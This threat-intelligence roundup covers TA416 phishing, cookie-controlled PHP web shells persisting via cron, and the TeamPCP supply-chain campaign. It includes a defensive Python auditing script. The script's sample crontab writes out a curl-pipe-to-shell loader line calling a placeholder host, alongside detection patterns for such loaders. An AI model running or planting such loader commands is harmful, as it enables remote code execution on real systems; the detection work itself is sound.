Originally reported by The Hacker News, SANS ISC
TL;DR
State-sponsored threat actors are escalating operations against European targets through sophisticated phishing campaigns and web shell persistence. The ongoing TeamPCP supply chain compromise has reached unprecedented scale with confirmed government breaches.
The TeamPCP supply chain campaign has compromised over 1,000 SaaS environments including the European Commission's cloud infrastructure, representing a critical threat to government and enterprise security.
The threat landscape this week showcases the persistent evolution of state-sponsored operations and supply chain compromises. From renewed Chinese targeting of European governments to sophisticated persistence mechanisms and unprecedented SaaS breaches, defenders face multi-vector challenges requiring immediate attention.
Proofpoint researchers have identified renewed targeting of European government and diplomatic organizations by TA416, a China-aligned threat actor with multiple overlapping designations including DarkPeony, RedDelta, and Vertigo Panda. The campaign marks a significant shift after a two-year period of minimal European targeting activity.
The operation leverages PlugX malware alongside OAuth-based phishing techniques to compromise government networks. TA416's return to European targeting suggests strategic realignment in Chinese cyber operations, potentially coordinated with broader geopolitical objectives.
The threat actor's use of OAuth-based phishing represents an evolution in technique, exploiting legitimate authentication protocols to bypass traditional email security controls. Organizations should review OAuth application permissions and implement enhanced monitoring for suspicious authentication flows.
The Microsoft Defender Security Research Team has documented a sophisticated web shell technique where threat actors use HTTP cookies as command and control channels on Linux servers. The approach represents a significant departure from traditional web shell implementations that rely on URL parameters or request bodies.
These PHP-based web shells achieve persistence through cron job scheduling, allowing attackers to maintain access even after initial compromise vectors are discovered. The cookie-controlled mechanism provides operational security benefits for threat actors by obscuring command execution within seemingly benign HTTP traffic.
The technique highlights the need for enhanced web application monitoring that includes cookie analysis and cron job auditing. Traditional web application firewalls may not detect these attacks without specific rules targeting cookie-based command channels.
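As an added defender-side example (not code from Microsoft's report), the following Python script runs the two checks the paragraph above calls for over constructed sample data: it audits crontab entries for interpreters launched on web-root files or download-and-run loaders, and flags cookie values that base64-decode to shell-like commands. The base64 encoding, the web-root paths and the keyword list are my assumptions, not indicators from the report.

```python
import base64
import re

# Constructed sample crontab (not from the report). The last two entries mimic
# a PHP web shell re-launched from a web root and a download-and-run loader.
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/php /var/www/html/uploads/.cache.php >/dev/null 2>&1
@reboot curl -s http://example.invalid/x | sh
"""

# Assumed web roots; extend to match the hosts you actually run.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx", "/var/lib/wordpress")
INTERPRETERS = re.compile(r"\b(php|perl|python[0-9.]*|sh|bash)\b")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def audit_cron(text):
    """Return (entry, reason) pairs for cron entries that deserve a human look."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if PIPE_TO_SHELL.search(line):
            hits.append((line, "downloads and pipes to a shell"))
        elif INTERPRETERS.search(line) and any(r in line for r in WEB_ROOTS):
            hits.append((line, "interpreter run on a web-root file"))
    return hits


# Assumed shell-command vocabulary; a heuristic, not an IoC from the report.
SHELLISH = re.compile(r"(?:^|[;&|\s])(uname|whoami|id|ls|cat|wget|curl|chmod)(?:[\s;&|]|$)")


def suspicious_cookie(value):
    """True if a cookie value base64-decodes to printable, shell-like text."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):  # not base64 / not text: skip
        return False
    return text.isprintable() and bool(SHELLISH.search(text))


# Constructed cookie values for a quick self-check.
SAMPLE_COOKIE = base64.b64encode(b"id;uname -a").decode()
BENIGN_COOKIE = base64.b64encode(b"user=alice").decode()

if __name__ == "__main__":
    for entry, reason in audit_cron(SAMPLE_CRON):
        print(f"[cron] {reason}: {entry}")
    print("[cookie]", SAMPLE_COOKIE, suspicious_cookie(SAMPLE_COOKIE))
```

On a real host, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d, and the Cookie headers from a proxy or access log configured to record them.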
SANS ISC's sixth intelligence update on the TeamPCP supply chain campaign reveals unprecedented scope, with Mandiant quantifying impact at over 1,000 SaaS environments. CERT-EU has confirmed the European Commission's cloud infrastructure as a verified victim, marking the campaign's expansion into critical government systems.
The campaign, dubbed "When the Security Scanner Became the Weapon," exploits compromised security scanning tools to establish persistent access across cloud environments. Recent developments include detailed post-compromise enumeration findings from Wiz and attribution of the axios package compromise to North Korean threat actors.
Sportradar has joined the growing list of confirmed victims, while LiteLLM has resumed operations following Mandiant's forensic audit. The scale and sophistication of the campaign underscore supply chain security as a critical vulnerability in modern cloud architectures.
Organizations should immediately audit their SaaS integrations, security scanning tool deployments, and third-party package dependencies. The campaign's impact on government infrastructure demands elevated threat modeling for cloud-first organizations.